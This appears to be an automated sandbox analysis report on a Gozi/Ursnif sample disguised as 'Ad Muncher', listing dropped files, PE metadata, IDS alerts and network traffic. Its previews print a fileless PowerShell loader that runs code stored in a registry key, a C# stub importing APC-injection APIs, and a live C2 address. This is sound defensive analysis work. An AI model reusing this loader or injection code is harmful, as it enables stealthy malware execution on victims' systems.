Preview:	L....A.a.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP................M....,...J;.............4.......C:\Users\user\AppData\Local\Temp\RES8712.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.n.3.0.0.s.0.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdpkmtso.umo.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_epyy1szg.01u.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\hscan34n.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	404
Entropy (8bit):	5.0070648605119645
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJA2EBaHMRSR7a18LTvVSRa+rVSSRnA/f0REWowy:V/DTLDfu2cPjLT89rV5nA/w/owy
MD5:	F0B963F8AA00CA94A4AD66F311B988E2
SHA1:	37F7E8D69DDEA558DEFD0C10FF1157E26884E7EC
SHA-256:	96038DB143062F959B6F1CA6944FCB0D291DA99881953ADE5A6BA02161CFA82A
SHA-512:	EE54EFC484487B7EB8EE8A1CCED621C16ADE5A4610084290D43CC0555BA498B693F1D5F43371266CFE4EBBE62762086FEF5C2363289D6B1621D07BF704C5E7D1
Malicious:	false
Reputation:	unknown
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class sbfhuady. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr avcd,IntPtr abnajnwd,IntPtr muceprj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint unieeqd,uint gwtu,IntPtr djihsvev);.. }..}.

C:\Users\user\AppData\Local\Temp\hscan34n.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.238076059987274
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23frqzxs7+AEszIWXp+N23frP:p37Lvkmb6KHGWZE8b
MD5:	61F20EEB83A2DF00A0E1C0D4368354EA
SHA1:	98B857458DF3E06C218FCFBC853AD767C74D7B8A
SHA-256:	9615118FD447D54C43293290C468D10221942E7E810F17F49480F7734D98AAC0
SHA-512:	A3E322EF05A55385894223D01811CAE07BB011AF57DCB9AFB81ACC3F04E124EE7A9BE3B6C9B1D367788A312452174864136480B4B34D3BF35B33D3ECAC53E46D
Malicious:	false
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hscan34n.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hscan34n.0.cs"

C:\Users\user\AppData\Local\Temp\hscan34n.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6126452766069947
Encrypted:	false
SSDEEP:	24:etGSE8OmU0t3lm85nt4tdxC6AC4Zz5tkZf36BBVUWI+ycuZhNMdakS/yPNnq:6+XQ3r5eXxPBJ36t31ulMda3/eq
MD5:	5CC9D50B6760682611B3001F799005E1
SHA1:	F520D61EF463854F7E3B91BEB55892F679D37891
SHA-256:	FA2213FE59474D70AD43F883D3B9A1F3BA16DE02ABE723CC01D55527EC05BD36
SHA-512:	42D5DEEDACC985F0CAD40C6CB5EDC64696C9F75011E6FD9636ACCF539665E80FE06A6201B290D24706E9836519A77129C9F02F8E56E0B086ED1A6F004C5BB524
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A.a...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................4.-....................................... .............. ;............ H............ [.....P ......f.........l.....q.....z.....................f. ...f...!.f.%...f............3.1.....;.......H.......[...........

C:\Users\user\AppData\Local\Temp\hscan34n.out Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	848
Entropy (8bit):	5.31481093333281
Encrypted:	false
SSDEEP:	12:xKIR37Lvkmb6KHGWZE8aKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KHXE8aKaM5DqBVKVrdFAMBJTH
MD5:	EAFAD10C6DD69F7BA9B9D2089259EC62
SHA1:	F0BC0816BD99DDA9C30AC968D4889F5D18F5D64D
SHA-256:	8BDEE52DE988618605086BBBC39BAE6D0D036D32C78046E6E4088EE50566D945
SHA-512:	DE3D2A986F37341410B6DE41DC495557D94F6EB2CD4A86B2A78273E853C0434099FE8573CF2654B4A55A0DC6294A6165AB065A663F41B686F2EB5981C3B9E376
Malicious:	false
Reputation:	unknown
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hscan34n.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hscan34n.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\DeviceFile.ps1 Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.42745270932473
Encrypted:	false
SSDEEP:	6:QH51se4AEegKz1+LgyKBM34H6sw83F1tu1TjtIBtNgAptn:Q7se4AEeNzgLgyaI4HRlANtIBtvptn
MD5:	7DD27CE4C0B3B5F7177B2FB71F66BC9B
SHA1:	C3D34E4179FE53C6EBFCBC80F81055A86B6DCD6B
SHA-256:	AF793E7055850DFD1B498482A5D7281BB71CAC42493B6A1563A2D99650B6A4D0
SHA-512:	79AD216282C466CE6626066C7773410DE5EBACDFC2FB27B382AF16E22CBE8704ECD71E14B8649B558EC9AE4BD800166957C50F669D0B8A342CFBAF791064B740
Malicious:	false
Reputation:	unknown
Preview:	new-alias -name dvjacwsnv -value gp;new-alias -name birkodk -value iex;birkodk ([System.Text.Encoding]::ASCII.GetString((dvjacwsnv "HKCU:\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))

C:\Users\user\Documents\20220112\PowerShell_transcript.768287.AFX4atZf.20220112130217.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1351
Entropy (8bit):	5.387953138240641
Encrypted:	false
SSDEEP:	24:BxSAUxvBnRRox2DOXUWt5KTLCHALIYBtBCWIHjeTKKjX4CIym1ZJXa5KTLCHALIS:BZovhXooON5KAAEeVIqDYB1Z85KAAEet
MD5:	BFA122D2010C9F247C467465FEEB48A3
SHA1:	45E447C7FE361ED90E3A65936B89164815A183CA
SHA-256:	5C163C94489717F2AA3DA74CB3986D6199865C779BCC72977507BEE575BE9F6E
SHA-512:	492B4E2A5B5F4CF91D126AAE6E2659DB879B4055307242084F2A725A349DD1709C71B2B248B948C4678F8B0153DE6AF1CBBFA3E6BFCAAC9257253E8637D94538
Malicious:	false
Reputation:	unknown
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220112130220..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 768287 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 6536..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220112130220..********************..PS>new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([Syst

C:\Users\user\SettingsDocument.lnk Download File
Process:	C:\Windows\explorer.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
Category:	dropped
Size (bytes):	838
Entropy (8bit):	3.073236880282747
Encrypted:	false
SSDEEP:	12:8glVm/3BVSXvk44X3ojsqzKtnWNaVgiNL4t2Y+xIBjK:8p/BHYVKVWiV57aB
MD5:	CA1C201059C5BFD5900F5EB2466883CC
SHA1:	BF3670A8C06A4FABC5C410F368E178B353F9166C
SHA-256:	E5717E89B0D46C5E89F39410FA7A9DE94AA6A3301F8AC920F84F1A7179554085
SHA-512:	2273AF46D41B9698B23AEADD8EFBEF80017CFD465B4347CFB99C2FEAE371F39A511288AA64AAFA2E35DD2AD883D8E43D70A65E62C18977C6C6D85E3153041D4C
Malicious:	false
Reputation:	unknown
Preview:	L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....Z.1...........System32..B............................................S.y.s.t.e.m.3.2.....t.1...........WindowsPowerShell.T............................................W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l... .N.1...........v1.0..:............................................v.1...0.....l.2...........powershell.exe..N............................................p.o.w.e.r.s.h.e.l.l...e.x.e...........\.p.o.w.e.r.s.h.e.l.l...e.x.e.........%...............wN....]N.D...Q..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.................

\Device\ConDrv Download File
Process:	C:\Windows\System32\nslookup.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	28
Entropy (8bit):	4.039148671903071
Encrypted:	false
SSDEEP:	3:U+6QlBxAN:U+7BW
MD5:	D796BA3AE0C072AA0E189083C7E8C308
SHA1:	ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
SHA-256:	EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
SHA-512:	BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
Malicious:	false
Reputation:	unknown
Preview:	Non-authoritative answer:...

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.2897830477166385
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	gozi.exe
File size:	167424
MD5:	8ee79738c37a919fdf38dc5a621556ce
SHA1:	ae35e761cd1633fa8b70bda3c2e3649c1694ffd1
SHA256:	51037666d1982db93e3123e88594d409805d3f1d970e9f926dcadb99f77f50f6
SHA512:	1f7081702e49222272fecc457153031457caa3376d5a11bcc4b333246626ebc7168e102ce2d229e7d4dc32d4ba5556541ff2cc5f26988e16331db33582e58688
SSDEEP:	3072:L6wsatjMVqRmJyGrYnw0Zz9EbuJL2/5ipGlXnHyJBA8lPqBohiVVHyM/:OvatSqRayG9aL+0Jrqfy2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.D..........."...0.................. ........@.. ....................................`................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x429fd2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Time Stamp:	0xBF44DD64 [Tue Sep 8 18:09:40 2071 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add dword ptr [edx], eax
add eax, dword ptr [00080706h+eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], ah
add byte ptr [eax], al
sbb byte ptr [eax], 00000000h
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add dword ptr [eax], eax
add byte ptr [eax], al
push eax
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add dword ptr [eax], eax
add byte ptr [eax], al
push 00800000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [ecx], cl
or al, 00h
add byte ptr [eax+00000000h], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+09000000h], bl
add al, 00h
add byte ptr [eax-48000000h], ch
mov al, byte ptr [03340002h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
in al, dx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x29f7e	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2a000	0x953	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x29ec4	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x27fe0	0x28000	False	0.724468994141	data	7.33101766252	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x2a000	0x953	0xa00	False	0.379296875	data	4.75466533347	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2c000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x2a0b8	0x334	data	English	Australia
RT_MANIFEST	0x2a3ec	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
RT_MANIFEST	0x2a5d8	0x37b	ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
LegalCopyright	Copyright Murray Hurps Software Pty Ltd
InternalName	Ad Muncher
FileVersion	4.94.34121 (Free)
CompanyName	Murray Hurps Software Pty Ltd
ProductName	Ad Muncher
ProductVersion	4.94.34121 (Free)
FileDescription	Ad Muncher
OriginalFilename	AdMunch.exe
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Australia
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/12/22-13:02:04.915315	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49751	80	192.168.2.3	185.189.12.123
01/12/22-13:02:04.915315	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49751	80	192.168.2.3	185.189.12.123
01/12/22-13:02:06.347888	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49752	80	192.168.2.3	185.189.12.123
01/12/22-13:02:06.347888	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49752	80	192.168.2.3	185.189.12.123
01/12/22-13:02:08.088711	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49754	80	192.168.2.3	185.189.12.123
01/12/22-13:04:09.103339	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49820	80	192.168.2.3	185.189.12.123
01/12/22-13:04:09.103339	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49820	80	192.168.2.3	185.189.12.123

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2022 13:01:26.050586939 CET	49743	443	192.168.2.3	144.76.136.153
Jan 12, 2022 13:01:26.050632000 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:26.050792933 CET	49743	443	192.168.2.3	144.76.136.153
Jan 12, 2022 13:01:26.093566895 CET	49743	443	192.168.2.3	144.76.136.153
Jan 12, 2022 13:01:26.093605042 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:26.174444914 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:26.174567938 CET	49743	443	192.168.2.3	144.76.136.153
Jan 12, 2022 13:01:26.180921078 CET	49743	443	192.168.2.3	144.76.136.153
Jan 12, 2022 13:01:26.180939913 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:26.181247950 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:26.228276014 CET	49743	443	192.168.2.3	144.76.136.153
Jan 12, 2022 13:01:26.496509075 CET	49743	443	192.168.2.3	144.76.136.153
Jan 12, 2022 13:01:26.537868977 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:27.129002094 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:27.129029989 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:27.129036903 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:27.129185915 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:27.129236937 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:27.129252911 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:27.129256010 CET	49743	443	192.168.2.3	144.76.136.153
Jan 12, 2022 13:01:27.129295111 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:27.129343033 CET	49743	443	192.168.2.3	144.76.136.153
Jan 12, 2022 13:01:27.129404068 CET	49743	443	192.168.2.3	144.76.136.153
Jan 12, 2022 13:01:27.129635096 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:27.129648924 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:27.129703045 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:27.129754066 CET	49743	443	192.168.2.3	144.76.136.153
Jan 12, 2022 13:01:27.129761934 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:27.129811049 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:27.129827976 CET	49743	443	192.168.2.3	144.76.136.153
Jan 12, 2022 13:01:27.129832983 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:27.129900932 CET	49743	443	192.168.2.3	144.76.136.153
Jan 12, 2022 13:01:27.129914999 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:27.129946947 CET	443	49743	144.76.136.153	192.168.2.3
Jan 12, 2022 13:01:27.129983902 CET	49743	443	192.168.2.3	144.76.136.153
Jan 12, 2022 13:01:27.130065918 CET	49743	443	192.168.2.3	144.76.136.153
Jan 12, 2022 13:01:27.132972002 CET	49743	443	192.168.2.3	144.76.136.153
Jan 12, 2022 13:02:04.862453938 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:04.914665937 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:04.914747000 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:04.915314913 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.006850958 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.378786087 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.378896952 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.378916979 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.378962040 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.378971100 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.379024982 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.379106045 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.379267931 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.379309893 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.379314899 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.379468918 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.379522085 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.379532099 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.387175083 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.387275934 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.431318998 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.431345940 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.431363106 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.431428909 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.431476116 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.431526899 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.431529999 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.431719065 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.431780100 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.431843996 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.431921959 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.431977034 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.431988001 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.432102919 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.432157993 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.432225943 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.432317972 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.432368994 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.439846039 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.439868927 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.439898968 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.439928055 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.481638908 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.483536959 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.483601093 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.483618975 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.483654976 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.483938932 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.483984947 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.484028101 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.484091043 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.484133005 CET	80	49751	185.189.12.123	192.168.2.3
